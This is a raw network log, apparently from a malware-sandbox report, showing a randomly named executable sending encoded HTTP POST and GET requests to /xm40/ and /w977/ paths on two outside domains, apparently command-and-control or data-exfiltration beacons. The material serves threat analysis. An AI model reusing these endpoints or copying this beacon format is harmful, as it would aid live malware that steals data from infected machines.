                                              Data Raw: 35 48 45 3d 51 59 6f 42 32 34 72 67 73 6a 4d 4f 2b 76 30 4e 65 4e 39 4c 51 2f 31 49 4a 55 51 43 35 6c 38 63 74 6d 67 66 38 45 63 30 42 4b 77 6b 4c 67 57 56 32 2f 63 37 45 4e 57 6a 44 32 70 56 6a 47 4c 45 64 63 47 4a 73 76 71 4e 38 37 69 4e 6d 38 4c 6d 4e 4a 6c 39 55 63 67 63 51 2f 5a 4f 31 54 30 50 69 62 6e 74 69 38 4a 63 71 4d 53 41 2b 48 6e 2f 48 61 53 75 54 58 49 78 70 6c 43 61 50 41 32 35 62 61 46 68 52 5a 39 70 54 34 57 58 67 39 4d 4a 6b 52 7a 63 76 55 2b 77 5a 71 78 38 73 75 51 42 6e 37 37 6f 6b 4e 57 76 71 4b 51 36 48 64 51 44 66 66 54 2f 79 56 51 37 6d 34 50 6c 2b 38 48 37 6b 5a 7a 78 78 72 70 43 34 52 56 4a 36 39 59 62 45 77 3d 3d
                                              Data Ascii: 5HE=QYoB24rgsjMO+v0NeN9LQ/1IJUQC5l8ctmgf8Ec0BKwkLgWV2/c7ENWjD2pVjGLEdcGJsvqN87iNm8LmNJl9UcgcQ/ZO1T0Pibnti8JcqMSA+Hn/HaSuTXIxplCaPA25baFhRZ9pT4WXg9MJkRzcvU+wZqx8suQBn77okNWvqKQ6HdQDffT/yVQ7m4Pl+8H7kZzxxrpC4RVJ69YbEw==
                                              Jul 21, 2024 13:31:58.865998030 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:31:58 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Powered-By: ASP.NET
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faQBi4XxkwYkG%2Bcusb%2B9g8AzfTGjvJyRW%2FefFCYEweeP1wm0z0v3JJny8cSPOQsO8Tn4%2BMWJrRwgL2If3ILE5ZFaQlSy4CHBzvZNBDAUw5kbQOwQFgMpDzF%2F3IzIk0q05Sl7Fx5K"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6ade23bd2b0f87-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 32 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
                                              Data Ascii: 2afTo0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6
                                              Jul 21, 2024 13:31:58.866065025 CEST82INData Raw: 08 2b 44 0e 12 33 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 f3 aa 7f 40 f8 0f 00 00 ff ff e3 e5 02 00 c9 45 66 f6 dd 04 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: +D3Q`N34oWH`4fT-e)]hR+UUc@Ef0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.749715188.114.97.3806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:00.990570068 CEST738OUTPOST /xm40/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.olhadeputat.com
                                              Origin: http://www.olhadeputat.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.olhadeputat.com/xm40/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 51 59 6f 42 32 34 72 67 73 6a 4d 4f 34 50 45 4e 59 75 56 4c 58 66 31 50 47 30 51 43 73 31 38 59 74 6d 73 66 38 47 77 6b 42 38 49 6b 4c 43 4f 56 31 2b 63 37 44 4e 57 6a 4d 57 70 4d 38 32 4b 49 64 63 37 30 73 76 57 4e 38 37 32 4e 6d 39 58 6d 4d 2b 35 2b 53 4d 67 61 59 66 5a 49 72 6a 30 50 69 62 6e 74 69 34 68 6c 71 4e 32 41 2b 58 33 2f 47 2b 6d 76 64 33 49 79 75 6c 43 61 64 77 32 39 62 61 45 4d 52 63 56 54 54 36 75 58 67 34 77 4a 6a 45 54 66 34 45 2b 32 55 4b 77 55 2f 73 34 4b 69 70 53 62 6c 62 57 55 71 71 55 71 43 72 4e 68 46 39 66 54 73 45 6f 41 69 36 72 54 70 61 61 4f 6d 59 33 70 38 4a 64 6a 6e 6d 77 6a 33 76 35 66 53 44 73 78 41 51 75 49 32 63 34 30 57 4d 64 2f 63 42 53 6a 41 78 59 3d
                                              Data Ascii: 5HE=QYoB24rgsjMO4PENYuVLXf1PG0QCs18Ytmsf8GwkB8IkLCOV1+c7DNWjMWpM82KIdc70svWN872Nm9XmM+5+SMgaYfZIrj0Pibnti4hlqN2A+X3/G+mvd3IyulCadw29baEMRcVTT6uXg4wJjETf4E+2UKwU/s4KipSblbWUqqUqCrNhF9fTsEoAi6rTpaaOmY3p8Jdjnmwj3v5fSDsxAQuI2c40WMd/cBSjAxY=
                                              Jul 21, 2024 13:32:01.508244991 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:01 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Powered-By: ASP.NET
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9DlxYB3gUIZr59Wek%2BG5QKdeJDlp6esF4zQdPZ3jb6EfSDAcTEWeTj6OZiMCuSKF5PO9GU2HxnPVWgNSAxEgRbLCxP8RVvR7BNc1KxZXXVwex%2B3O5qFGnCH6ZVJgEXkPzXHmyCo"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6ade345b560f6b-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
                                              Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6+D3
                                              Jul 21, 2024 13:32:01.508265972 CEST81INData Raw: 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 f3 aa 7f 40 f8 0f 00 00 ff ff 0d 0a 63 0d 0a e3 e5 02 00 c9 45 66 f6 dd 04 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: Q`N34oWH`4fT-e)]hR+UUc@cEf0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.749716188.114.97.3806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:03.893337011 CEST1751OUTPOST /xm40/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.olhadeputat.com
                                              Origin: http://www.olhadeputat.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.olhadeputat.com/xm40/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 51 59 6f 42 32 34 72 67 73 6a 4d 4f 34 50 45 4e 59 75 56 4c 58 66 31 50 47 30 51 43 73 31 38 59 74 6d 73 66 38 47 77 6b 42 2f 6f 6b 49 78 47 56 33 64 45 37 43 4e 57 6a 46 32 70 4a 38 32 4c 53 64 59 75 2f 73 76 61 64 38 35 4f 4e 6d 66 7a 6d 4c 4c 4e 2b 63 4d 67 61 48 50 5a 4e 31 54 31 56 69 62 32 6b 69 38 4e 6c 71 4e 32 41 2b 53 37 2f 50 4b 53 76 66 33 49 78 70 6c 43 73 50 41 32 46 62 61 4d 79 52 63 5a 44 54 4a 6d 58 68 59 41 4a 69 33 37 66 37 6b 2b 30 54 4b 77 4d 2f 73 6c 53 69 70 50 67 6c 62 4c 78 71 74 67 71 43 75 77 34 66 38 54 72 2f 6c 38 66 68 4a 54 46 76 34 32 48 2f 35 4c 78 38 75 6c 66 6d 32 38 48 32 4a 4e 4b 61 58 39 38 57 43 6e 34 77 6f 77 74 59 62 45 57 49 54 69 5a 65 6c 39 59 4e 31 50 2f 69 58 73 71 70 78 4d 6f 44 6f 4b 31 55 47 55 4b 41 6f 6d 55 49 6d 35 65 6e 6b 4e 5a 64 59 75 72 53 6d 34 54 48 4c 67 4e 38 74 44 75 53 37 78 50 49 76 42 36 4e 46 4b 72 65 63 50 6b 4c 4b 54 7a 31 58 78 47 76 46 52 59 63 6f 6e 68 67 46 54 76 78 51 48 35 32 45 4a 70 69 53 69 36 69 4d 31 56 52 62 [TRUNCATED]
                                              Data Ascii: 5HE=QYoB24rgsjMO4PENYuVLXf1PG0QCs18Ytmsf8GwkB/okIxGV3dE7CNWjF2pJ82LSdYu/svad85ONmfzmLLN+cMgaHPZN1T1Vib2ki8NlqN2A+S7/PKSvf3IxplCsPA2FbaMyRcZDTJmXhYAJi37f7k+0TKwM/slSipPglbLxqtgqCuw4f8Tr/l8fhJTFv42H/5Lx8ulfm28H2JNKaX98WCn4wowtYbEWITiZel9YN1P/iXsqpxMoDoK1UGUKAomUIm5enkNZdYurSm4THLgN8tDuS7xPIvB6NFKrecPkLKTz1XxGvFRYconhgFTvxQH52EJpiSi6iM1VRbwKucf8O9niWSueMf9JCH/Ju3JMhP7bS30aVtz9MeufoJ/EcEgmST5Gut/WVLCMfm/ueV//FcjAwILr5vBzGP6s1JUKGWDkNhhH7C+soPyoMEKtV12taSEF7kmun/ZM7RfuGJM2KlkAJ6AlnIh6p7yhTdSQ+uaIQ3mNJc0rYzZ29sm/fU5/q0mhTlIDujy9ycCfOBGNztkk3/kXnHzHm1y2Vzrd8bGdidLnl7prB0mQS16XtWO8kmYdjaHF1nURunsyXVeOOboMEp5RXaAZaVOVeNRJb4nrsrS9E3+fAj9UHejGenOlDQLcUmHIOSuweuNqsIXptMlRsUE376r1OqWQV8uEwKhPG/nFOg6uGJOOTxuxkCJr5COyKXdMOZrflTWjldZgmyZTAEs5ootI/kapx3DkRcFELt897NLWeS3kzRHoDF+hJfvd/DvwO8grj7w0wkfN+ndxDccNDRjR7coZ3dBZ6+D247Y7hwIW/iPEKvcDJriPUaDuYPq8RQwcSiix0mxrrwOge+VHN62no3MOtj4AiuUNNiP0FEJM4c+W2hjTrTMcewxAe/TFlhTId0Vituct/ZPwnt0sPp6QjYNB4ue7MQh/6wIS5KzCuLDkfIlgEyKgj893oWWH7oSTxOVGyaAVooIS9qQmDpTmMwCphk94GpKzM/TM [TRUNCATED]
                                              Jul 21, 2024 13:32:04.501538038 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:04 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Powered-By: ASP.NET
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLhXaCQoO%2Fg%2FS4kXZZzMSf6iCMfEsJC7wuHIHjKvgOsaEKfAa0VTadCSFm5%2FVnxyeEblOeDCbXCANW6GUtC1SD50Uix5NtbC8%2Fj6gTNmvWxai0AxHl3X2aEV%2B%2FjvrmHOEPU%2BHi4S"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6ade46f8b641ec-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
                                              Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6
                                              Jul 21, 2024 13:32:04.501636982 CEST91INData Raw: 89 86 84 16 08 2b 44 0e 12 33 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 f3 aa 7f 40 f8 0f 00 00 ff ff 0d 0a 63 0d 0a e3 e5 02 00 c9 45 66 f6 dd 04
                                              Data Ascii: +D3Q`N34oWH`4fT-e)]hR+UUc@cEf0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.749717188.114.97.3806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:06.420315027 CEST449OUTGET /xm40/?5HE=daAh1PvHixV61uAQZMYKPaNePBcxkEwbh0Ym6iIWO855OlL+0fA+LsjnAgtj7WyOZoCeoLSk25i6sMGFDrtEZ/sdfpdR1CdNhpbdr9VgkorBlDalMPv+Xn4VuwyhQF+VdIAPT792X8nN&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.olhadeputat.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:06.994693995 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:06 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Powered-By: ASP.NET
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I43eZN%2FxfKgbDsrxD3A1cnumjZqq3E3oa1BGwFR%2FRgaVpv56fLeYgZQIVDFMeeG%2BjpPm2l%2FEHFdJ%2FYduCvBMygvrCfkjyRAu9TJywKMpYEzaZQHO3OQzeTAasFNlnywMelKRSVxh"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6ade569f130cb8-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a [TRUNCATED]
                                              Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;
                                              Jul 21, 2024 13:32:06.994718075 CEST224INData Raw: 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d
                                              Data Ascii: padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding
                                              Jul 21, 2024 13:32:06.994730949 CEST392INData Raw: 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65
                                              Data Ascii: :10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.749718103.168.172.37806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:32:12.332983017 CEST709OUTPOST /w977/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.jleabres.com/w977/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 4e 78 41 4a 75 64 7a 38 71 63 4f 77 37 4c 71 74 68 34 53 6a 34 36 48 33 37 4b 64 78 75 57 67 6b 4e 54 2b 7a 76 49 70 59 6a 30 47 4f 4f 56 51 44 34 45 65 49 67 52 4f 37 63 48 6e 30 65 35 55 6c 6a 49 2f 52 74 35 57 6b 76 64 56 6f 32 43 2b 74 70 63 4d 4c 7a 79 4b 55 52 70 43 45 66 6c 35 42 76 33 46 33 51 79 6b 54 35 76 53 36 47 52 55 33 51 43 33 6c 32 36 6e 2b 71 6d 47 6d 45 74 50 70 71 69 51 2b 32 43 4f 5a 35 57 35 63 46 69 38 52 54 4c 67 36 76 6d 42 42 57 6b 31 45 68 6e 55 5a 66 54 62 4c 6b 50 62 53 44 4f 65 74 4b 49 31 35 36 7a 39 37 31 56 56 6c 35 43 75 50 31 43 5a 55 4d 43 31 70 57 67 4a 79 42 4c 49 32 74 67 77 6f 32 77 3d 3d
                                              Data Ascii: 5HE=NxAJudz8qcOw7Lqth4Sj46H37KdxuWgkNT+zvIpYj0GOOVQD4EeIgRO7cHn0e5UljI/Rt5WkvdVo2C+tpcMLzyKURpCEfl5Bv3F3QykT5vS6GRU3QC3l26n+qmGmEtPpqiQ+2COZ5W5cFi8RTLg6vmBBWk1EhnUZfTbLkPbSDOetKI156z971VVl5CuP1CZUMC1pWgJyBLI2tgwo2w==
                                              Jul 21, 2024 13:32:13.847666025 CEST570INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:32:13 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web4
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_c0b6e81f34d8775b85ef094bbfe3f4d8
                                              Content-Encoding: br
                                              Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
